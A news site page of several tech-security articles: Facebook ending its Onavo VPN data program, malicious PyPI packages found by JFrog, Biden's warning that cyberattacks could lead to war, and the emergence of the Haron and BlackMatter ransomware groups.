Connect with us

Biz & IT

Facebook will shut down its spyware VPN app Onavo

Published

on

Facebook will end its unpaid market research programs and proactively take its Onavo VPN app off the Google Play store in the wake of backlash following TechCrunch’s investigation about Onavo code being used in a Facebook Research app the sucked up data about teens. The Onavo Protect app will eventually shut down, and will immediately cease pulling in data from users for market research though it will continue operating as a Virtual Private Network in the short-term to allow users to find a replacement.

Facebook has also ceased to recruit new users for the Facebook Research app that still runs on Android but was forced off of iOS by Apple after we reported on how it violated Apple’s Enterprise Certificate program for employee-only apps. Existing Facebook Research app studies will continue to run, though.

With the suspicions about tech giants and looming regulation leading to more intense scrutiny of privacy practices, Facebook has decided that giving users a utility like a VPN in exchange for quietly examining their app usage and mobile browsing data isn’t a wise strategy. Instead, it will focus on paid programs where users explicitly understand what privacy they’re giving up for direct financial compensation.

Onavo billed itself as a way to “limit apps from using background data and “use a secure VPN network for your personal info” but also noted it would collect the “Time you spend using apps, mobile and Wi-Fi data you use per app, the websites you visit, and your country, device and network type” A Facebook spokesperson confirmed the change and provided this statement: “Market research helps companies build better products for people. We are shifting our focus to reward-based market research which means we’re going to end the Onavo program.”

Facebok acquired Onavo in 2013 for a reported $200 million to use its VPN app the gather data about what people were doing on their phones. That data revealed WhatsApp was sending over twice as many messages per day as Messenger, BuzzFeed’s Ryan Mac and Charlie Warzel reported, convincing Facebook to pay a steep sum of $19 billion to buy WhatsApp. Facebook went on to frame Onavo as a way for users to reduce their data usage, block dangerous websites, keep their traffic safe from snooping — while Facebook itself was analyzing that traffic. The insights helped it discover new trends in mobile usage, keep an eye on competitors, and figure out what features or apps to copy. Cloning became core to Facebook’s product strategy over the past years, with Instagram’s version of Snapchat Stories growing larger than the original.

But last year, privacy concerns led Apple to push Facebook to remove the Onavo VPN app from the App Store, though it continued running on Google Play. But Facebook quietly repurposed Onavo code for use in its Facebook Research app that TechCrunch found was paying users in the U.S. and India ages 13 to 35 up to $20 in gift cards per month to give it VPN and root network access to spy on all their mobile data.

Facebook ran the program in secret, obscured by intermediary beta testing services like Betabound and Applause. It only informed users it recruited with ads on Instagram, Snapchat and elsewhere that they were joining a Facebook Research program after they’d begun signup and signed non-disclosure agreements. A Facebook spokesperson claimed in a statement that “there was nothing ‘secret’ about this”, yet it had threatened legal action if users publicly discussed the Research program.

But the biggest problem for Facebook ended up being that its Research app abused Apple’s Enterprise Certificate program meant for employee-only apps to distribute the app outside the company. That led Apple to ban the Research app from iOS and invalidate Facebook’s certificate. This shut down Facebook’s internal iOS collaboration tools, pre-launch test versions of its popular apps, and even its lunch menu and shuttle schedule to break for 30 hours, causing chaos at the company’s offices.

To preempt any more scandals around Onavo and the Facebook Research app and avoid Google stepping in to forcibly block the apps, Facebook is now taking Onavo off the Play Store and stopping recruitment of Research testers. That’s a surprising voluntary move that perhaps shows Facebook is finally getting in tune with the public perception of its shady actions. The company has repeatedly misread how users would react to its product launches and privacy invasions, leading to near constant gaffes and an unending news cycle chronicling its blunders.

Without Onavo, Facebook loses a powerful method of market research, and its future initiatives here will come at a higher price. Facebook has run tons of focus groups, surveys, and other user feedback programs over the past decade to learn where it could improve or what innovations it could co-opt. And with more apps recently turning on encryption, Onavo likely started learning less about their usage. But given how cloning plus acquisitions like WhatsApp and Instagram have been vital to Facebook’s success, it’s likely worth paying out more gift cards and more tightly monitoring its research practices. Otherwise Facebook could miss the next big thing that might disrupt it.

Hopefully Facebook will be less clandestine with its future market research programs. It should be upfront about its involvement, make certain that users understand what data they’re giving up, stop researching teens or at the very least verify the consent of their parents, and avoid slurping up sensitive information or data about a user’s unwitting friends. For a company that depends on people to trust it with their content, it has a long way to go win back our confidence.

Source link

Source link

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Biz & IT

Malicious PyPI packages caught stealing developer data and injecting code

Published

on

Open source packages downloaded an estimated 30,000 times from the PyPI open source repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code on infected machines, researchers said on Thursday.

In a post, researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe of security firm JFrog said they recently found eight packages in PyPI that carried out a range of malicious activity. Based on searches on https://pepy.tech, a site that provides download stats for Python packages, the researchers estimate the malicious packages were downloaded about 30,000 times.

Systemic threat

The discovery is the latest in a long line of attacks in recent years that abuse the receptivity of open source repositories, which millions of software developers rely on daily. Despite their crucial role, repositories often lack robust security and vetting controls, a weakness that has the potential to cause serious supply chain attacks when developers unknowingly infect themselves or fold malicious code into the software they publish.

“The continued discovery of malicious software packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks,” JFrog CTO Asaf Karas wrote in an email. “The ability for attackers to use simple obfuscation techniques to introduce malware means developers have to be concerned and vigilant. This is a systemic threat, and it needs to be actively addressed on several layers, both by the maintainers of software repositories and by the developers.”

The researchers thanked PyPI maintainer Dustin Ingram “for quickly responding and removing the malicious packages” when notified. Ingram didn’t immediately respond to a request for comment.

Different packages from Thursday’s haul carried out different kinds of nefarious activities. Six of them had three payloads, one for harvesting authentication cookies for Discord accounts, a second for extracting any passwords or payment card data stored by browsers, and the third for gathering information about the infected PC, such as IP addresses, computer name, and user name.

The remaining two packages had malware that tries to connect to an attacker-designated IP address on TCP port 9009, and to then execute whatever Python code is available from the socket. It’s not now known what the IP address was or if there was malware hosted on it.

Like most novice Python malware, the packages used only a simple obfuscation such as from Base64 encoders. Here’s a breakdown of the packages:

Package name Maintainer Payload
noblesse xin1111 Discord token stealer, Credit card stealer (Windows-based)
genesisbot xin1111 Same as noblesse
are xin1111 Same as noblesse
suffer suffer Same as noblesse , obfuscated by PyArmor
noblesse2 suffer Same as noblesse
noblessev2 suffer Same as noblesse
pytagora leonora123 Remote code injection
pytagora2 leonora123 Same as pytagora

Karas told me that the first six packages had the ability to infect the developer computer but couldn’t taint the code developers wrote with malware.

“For both the pytagora and pytagora2 packages, which allows code execution on the machine they were installed, this would be possible.” he said in a direct message. “After infecting the development machine, they would allow code execution and then a payload could be downloaded by the attacker that would modify the software projects under development. However, we don’t have evidence that this was actually done.”

Beware of ‘Frankenstein’ malware packages

Rather than spending days developing code that performs everyday tasks, coders can instead turn to repositories like PyPI, RubyGems, or npm to obtain mature app packages that peers have already developed. Among the 2.7 million packages available on PyPI, for example, are ones developers can use to make apps ​​predict a home’s selling price using data scraped from the Internet, send emails through Amazon’s Simple Email Service, or check open source code for vulnerabilities. PyPI provides packages for software written in Python, while RubyGems and npm provide packages for Ruby and JavaScript apps.

This crucial role makes repositories the ideal setting for supply-chain attacks, which have grown increasingly common using techniques known as typosquatting or dependency confusion.

Repository supply-chain attacks date back to at least 2016, when a college student uploaded malicious packages to PyPI. Over a span of several months, his imposter code was executed more than 45,000 times on more than 17,000 separate domains, and more than half the time his code was given all-powerful administrative rights.
Since then, supply-chain attacks have become a regular occurrence for RubyGems and npm.
In recent months, white hat hackers have cooked up a new type of supply-chain attack that works by uploading malicious packages to public code repositories and giving them a name that’s identical to a package stored in the internal repository for a popular piece of software. These so-called dependency confusion attacks have already snared Apple, Microsoft, and 33 other companies.

The JFrog researchers said that, based on the current state of repository security, the Internet is likely to see more attacks in the future.

“Almost all of the code snippets analyzed in this research were based on known public tools, with only a few parameters changed,” they wrote. “The obfuscation was also based on public obfuscators. We expect to see more of these ‘Frankenstein’ malware packages stitched from different attack tools (with changed exfiltration parameters).”

Continue Reading

Biz & IT

Biden warns cyber attacks could lead to a “real shooting war”

Published

on

Enlarge / US President Joe Biden, NATO Secretary General Jens Stoltenberg and Belgian Prime Minister Alexander De Croo attend a plenary session of a NATO summit at the North Atlantic Treaty Organization (NATO) headquarters in Brussels, on June 14, 2021.

President Joe Biden has warned that cyberattacks could escalate into a full-blown war as tensions with Russia and China mounted over a series of hacking incidents targeting US government agencies, companies, and infrastructure.

Biden said on Tuesday that cyber threats including ransomware attacks “increasingly are able to cause damage and disruption in the real world.”

“If we end up in a war, a real shooting war with a major power, it’s going to be as a consequence of a cyber breach,” the president said in a speech at the Office for the Director of National Intelligence, which oversees 18 US intelligence agencies.

A number of recent hacks revealed the extent of US cyber vulnerability, ranging from extensive espionage breaches that have struck at the heart of government to ransomware attacks that have brought operations at an important oil pipeline and meat packing plants to a halt.

The Biden administration has accused the governments of Russia and China, or hackers based inside the two countries, of some of the attacks. US officials have warned that the administration would respond with a “mix of tools seen and unseen” actions, but cyber breaches have continued.

Although he did not say who such a war might be fought against, Biden immediately name-checked Russia’s president Vladimir Putin, alleging that Russia was spreading misinformation ahead of the 2022 US midterm elections.

“It’s a pure violation of our sovereignty,” he said.

“Mr. Putin… has a real problem. He is sitting on top of an economy that has nuclear weapons and oil wells and nothing else. Nothing else,” Biden said. “He knows he’s in real trouble, which makes him even more dangerous.”

At a June summit in Geneva, Biden personally warned Putin that the US would “respond with cyber” if the Russian state or Russian-based hackers targeted critical US infrastructure.

The prohibited sectors spanned energy, health care, IT, and commercial facilities, all of which have already allegedly been targeted by Russian hackers since the 2020 US elections. Others included transport, financial services, and chemicals.

Biden also said Chinese President Xi Jinping was “deadly earnest” about China becoming the most powerful military force in the world by the 2040s, as well as the largest and most prominent economy.

“It’s real… This boy’s got a plan,” Biden said, adding: “We better figure out how we’re going to keep pace without exacerbating [the situation].”

Biden stressed that cyberattacks were just one aspect of the growing threats facing the US, saying that there would be more developments in the next 10 years than in the past 50, placing a tremendous burden on the intelligence community.

“It’s really going to get tougher,” he said.

© 2021 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.

Continue Reading

Biz & IT

Haron and BlackMatter are the latest groups to crash the ransomware party

Published

on

Getty Images

July has so far ushered in at least two new ransomware groups. Or maybe they’re old ones undergoing a rebranding. Researchers are in the process of running down several different theories.

Both groups say they are aiming for big-game targets, meaning corporations or other large businesses with the pockets to pay ransoms in the millions of dollars. The additions come as recent ransomware intrusions of oil pipeline operator Colonial Pipeline, meat packer JBS SA, and managed network provider Kaseya have caused major disruptions and created pressure in Washington to curb the threats.

Haron: like Avaddon. Or maybe not

The first group is calling itself Haron. A sample of the Haron malware was first submitted to VirusTotal on July 19. Three days later, South Korean security firm S2W Lab discussed the group in a post.

Most of the group’s site on the dark web is password protected by extremely weak credentials. Once past the login page, there’s a list of alleged targets, a chat transcript that’s not fit to be shown in full, and the group’s explanation of its mission.

As S2W Lab pointed out, the layout, organization, and appearance of the site are almost identical to those for Avaddon, the ransomware group that went dark in June after sending a master decryption key to BleepingComputer that victims could use to recover their data.

The similarity on its own isn’t especially meaningful. It could mean that the creator of the Haron site had a hand in administering the Avaddon site. Or it could be the Haron site creator doing a headfake.

A connection between Haron and Avaddon would be more convincing if there were overlaps or similarities in the code used by the two groups. So far there are no such links reported.

The engine driving Haron ransomware, according to S2W Lab, is Thanos, a separate piece of ransomware that has been around since at least 2019. Haron was developed using a recently published Thanos builder for the C# programming language. Avaddon, by contrast, was written in C++.

Jim Walter, a senior threat researcher at security firm SentinelOne, said in a text message that he spotted what appear to be similarities with Avaddon in a couple of samples he recently started analyzing. He said he’d know more soon.

In the shadows of REvil and DarkSide

The second ransomware newcomer is calling itself BlackMatter. It was reported on Tuesday by security firm Recorded Future and its news arm The Record.

Recorded Future, The Record, and security firm Flashpoint, which also covered the emergence of BlackMatter, have questioned if the group has connections to either DarkSide or REvil. Those two ransomware groups suddenly went dark after attacks—against global meat producer JBS and managed network services provider Kaseya in REvil’s case and Colonial Pipeline in the case of DarkSide—generated more attention than the groups wanted. The Justice Department later claimed to have recovered $2.3 million from Colonial’s ransomware payment of $4.4 million.

But once again, the similarities at this point are all cosmetic and include the wording of a pledge, first made by DarkSide, not to target hospitals or critical infrastructure. Given the heat US President Joe Biden is trying to put on his Russian counterpart to crack down on Ransomware groups operating in Eastern Europe, it wouldn’t be surprising to see all groups follow DarkSide’s lead.

None of this is to say that the speculation is wrong, only that at the moment there’s little more than hunches for support.

Continue Reading

Trending